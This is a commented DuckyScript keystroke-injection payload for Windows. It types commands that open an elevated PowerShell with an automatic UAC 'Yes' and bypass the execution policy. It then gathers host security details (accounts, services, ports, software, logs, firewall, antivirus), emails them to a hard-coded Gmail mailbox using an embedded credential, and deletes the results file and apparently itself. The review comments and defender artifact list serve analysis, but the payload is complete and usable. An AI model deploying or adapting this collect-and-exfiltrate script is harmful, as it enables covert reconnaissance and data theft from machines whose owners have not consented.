REM script in progress
REM
REM Purpose: DuckyScript keystroke-injection payload for Windows. It opens an
REM elevated PowerShell console, types a script block that collects host
REM configuration into results.txt, sends the file contents through
REM smtp.gmail.com, and then deletes results.txt.
REM
REM Every PowerShell line below is typed at the prompt, one STRING/ENTER pair
REM at a time. The fixed DELAY values are the only synchronisation with the
REM target UI, so statement order and timing are significant.
REM
REM Artifacts a defender can look for, all derived from the commands below:
REM   - an elevated powershell.exe started from the Start Menu search
REM   - results.txt created in the console's working directory
REM   - HTTPS requests to services.nvd.nist.gov from powershell.exe
REM   - an SMTP session to smtp.gmail.com from powershell.exe
REM   - where PowerShell script block logging is enabled, the typed commands
REM     themselves would be expected in that log (confirm per host policy)
DELAY 1000
REM Open Start Menu
CONTROL ESCAPE
DELAY 3000
STRING powershell
REM Navigate to the context menu to run PowerShell as an administrator
REM NOTE(review): the RIGHTARROW/DOWNARROW sequence depends on the Start Menu
REM layout of the Windows build in use - confirm it selects the intended entry.
DELAY 2000
RIGHTARROW
DELAY 500
DOWNARROW
DELAY 500
ENTER
DELAY 5000
REM ALT+Y presumably answers "Yes" on the UAC consent dialog (English UI).
REM If UAC asks for credentials instead, this keystroke lands elsewhere.
ALT Y
DELAY 5000
REM Set PowerShell Execution Policy to Bypass
REM -scope process limits the change to this PowerShell process only.
DELAY 1000
STRING set-executionpolicy bypass -scope process -force
DELAY 100
ENTER
DELAY 400
REM Create the PowerShell script in memory and execute it
REM
REM The mailbox password is a literal in the payload ('YourAppSpecificPassword'
REM is a placeholder). Whatever replaces it is stored in clear text on the
REM injection device and typed in clear text on the target's screen.
DELAY 100
STRING $securepassword = convertto-securestring 'YourAppSpecificPassword' -asplaintext -force
DELAY 100
ENTER
DELAY 400
REM Credential object for the hard-coded mailbox; used later for SMTP auth.
STRING $credential = new-object system.management.automation.pscredential ('igrowsc@gmail.com', $securepassword)
DELAY 100
ENTER
DELAY 400
REM Start of the script block; nothing inside runs until invoke-command below.
STRING $script = {
DELAY 100
ENTER
DELAY 400
REM check-passwordpolicy: output of "net accounts" (local account policy).
STRING function check-passwordpolicy {
DELAY 100
ENTER
DELAY 400
STRING net accounts
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM audit-services: name, display name, status and start type of all services.
STRING function audit-services {
DELAY 100
ENTER
DELAY 400
STRING get-service | select-object name, displayname, status, starttype
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM check-networksettings: IP configuration of the host's interfaces.
STRING function check-networksettings {
DELAY 100
ENTER
DELAY 400
STRING get-netipconfiguration
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM check-softwarevulnerabilities: installed-software inventory (name, version,
REM publisher). It reads only the WOW6432Node uninstall key, so software
REM registered under the native uninstall key is not listed.
STRING function check-softwarevulnerabilities {
DELAY 100
ENTER
DELAY 400
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM check-cve: keyword lookup of one product/version pair against the NVD
REM REST API; prints "<CVE id> - <description>" per hit, or a "no cves found"
REM line. The product name and version go into the URL unencoded, and each
REM lookup discloses an installed product name to an external service.
REM NOTE(review): this is the 1.0 JSON endpoint; NVD has moved to API 2.0, so
REM confirm this URL still answers before trusting a "no cves found" result.
STRING function check-cve {
DELAY 100
ENTER
DELAY 400
STRING param (
DELAY 100
ENTER
DELAY 400
STRING [string]$productname,
DELAY 100
ENTER
DELAY 400
STRING [string]$version
DELAY 100
ENTER
DELAY 400
STRING )
DELAY 100
ENTER
DELAY 400
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
DELAY 100
ENTER
DELAY 400
REM Five-second pause before every request (presumably for API rate limits).
STRING start-sleep -seconds 5
DELAY 100
ENTER
DELAY 400
STRING $response = invoke-restmethod -uri $uri -method get
DELAY 100
ENTER
DELAY 400
STRING if ($response.totalresults -gt 0) {
DELAY 100
ENTER
DELAY 400
STRING foreach ($cve in $response.result.cve_items) {
DELAY 100
ENTER
DELAY 400
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
STRING } else {
DELAY 100
ENTER
DELAY 400
STRING "no cves found for $productname $version"
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM analyze-logs: the 100 newest entries of the System event log.
STRING function analyze-logs {
DELAY 100
ENTER
DELAY 400
STRING get-eventlog -logname system -newest 100
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM check-openports: all connections and listening ports, numeric form.
STRING function check-openports {
DELAY 100
ENTER
DELAY 400
STRING netstat -an
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM check-missingupdates
REM NOTE(review): Get-WindowsUpdateLog converts Windows Update trace files into
REM a readable log file; it does not enumerate missing updates, so this section
REM of results.txt probably does not contain what the function name promises.
STRING function check-missingupdates {
DELAY 100
ENTER
DELAY 400
STRING get-windowsupdatelog
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM check-firewallstatus: Windows Firewall settings for all profiles.
STRING function check-firewallstatus {
DELAY 100
ENTER
DELAY 400
STRING netsh advfirewall show allprofiles
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM check-smbv1status: state of the SMB1Protocol optional feature.
STRING function check-smbv1status {
DELAY 100
ENTER
DELAY 400
STRING get-windowsoptionalfeature -online -featurename smb1protocol
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM check-antivirusstatus: Microsoft Defender status only; other antivirus
REM products are not queried.
STRING function check-antivirusstatus {
DELAY 100
ENTER
DELAY 400
STRING get-mpcomputerstatus
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM send-emailandcleanup: sends one message over SMTP with SSL enabled, then
REM deletes the results file. Despite the parameter name, nothing is attached:
REM the file content is appended to the message body. There is no error
REM handling between the send and the delete, so the only local copy of the
REM collected data is removed regardless of whether the send succeeded.
STRING function send-emailandcleanup {
DELAY 100
ENTER
DELAY 400
STRING param (
DELAY 100
ENTER
DELAY 400
STRING [string]$smtpserver,
DELAY 100
ENTER
DELAY 400
STRING [string]$smtpfrom,
DELAY 100
ENTER
DELAY 400
STRING [string]$smtpto,
DELAY 100
ENTER
DELAY 400
STRING [string]$messagesubject,
DELAY 100
ENTER
DELAY 400
STRING [string]$messagebody,
DELAY 100
ENTER
DELAY 400
STRING [string]$attachmentpath,
DELAY 100
ENTER
DELAY 400
STRING [system.management.automation.pscredential]$credential
DELAY 100
ENTER
DELAY 400
STRING )
DELAY 100
ENTER
DELAY 400
STRING $smtp = new-object net.mail.smtpclient($smtpserver)
DELAY 100
ENTER
DELAY 400
STRING $smtp.credentials = $credential
DELAY 100
ENTER
DELAY 400
STRING $smtp.enablessl = $true
DELAY 100
ENTER
DELAY 400
STRING $smtp.send($smtpfrom, $smtpto, $messagesubject, $messagebody + (get-content -path $attachmentpath -raw))
DELAY 100
ENTER
DELAY 400
STRING remove-item -path $attachmentpath
DELAY 100
ENTER
DELAY 400
STRING }
DELAY 100
ENTER
DELAY 400
REM Collection phase. The first redirect (>) creates or truncates results.txt
REM in the console's current directory; every later check appends (>>).
STRING check-passwordpolicy > results.txt
DELAY 100
ENTER
DELAY 400
STRING audit-services >> results.txt
DELAY 100
ENTER
DELAY 400
STRING check-networksettings >> results.txt
DELAY 100
ENTER
DELAY 400
STRING check-softwarevulnerabilities >> results.txt
DELAY 100
ENTER
DELAY 400
STRING analyze-logs >> results.txt
DELAY 100
ENTER
DELAY 400
STRING check-openports >> results.txt
DELAY 100
ENTER
DELAY 400
STRING check-missingupdates >> results.txt
DELAY 100
ENTER
DELAY 400
STRING check-firewallstatus >> results.txt
DELAY 100
ENTER
DELAY 400
STRING check-smbv1status >> results.txt
DELAY 100
ENTER
DELAY 400
STRING check-antivirusstatus >> results.txt
DELAY 100
ENTER
DELAY 400
REM One check-cve call (and one five-second sleep) per uninstall-key entry,
REM including entries whose displayname or displayversion is empty.
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | foreach-object { check-cve -productname $_.displayname -version $_.displayversion } >> results.txt
DELAY 100
ENTER
DELAY 400
REM Sender and recipient are the same hard-coded mailbox. The collected host
REM configuration leaves the machine in the body of this message.
STRING send-emailandcleanup -smtpserver "smtp.gmail.com" -smtpfrom "igrowsc@gmail.com" -smtpto "igrowsc@gmail.com" -messagesubject "vulnerability scan results" -messagebody "attached are the results of the vulnerability scan." -attachmentpath "results.txt" -credential $credential
DELAY 100
ENTER
DELAY 400
REM Attempts to delete the path held in $myinvocation.mycommand.path.
REM NOTE(review): this block is typed at the prompt rather than loaded from a
REM script file - confirm what that expression evaluates to in this context.
STRING remove-item -path $myinvocation.mycommand.path
DELAY 100
ENTER
DELAY 400
REM End of the script block.
STRING }
DELAY 100
ENTER
DELAY 400
REM Run the script block in the current elevated session.
STRING invoke-command -scriptblock $script
DELAY 100
ENTER
REM Final pause while the typed script runs.
DELAY 20000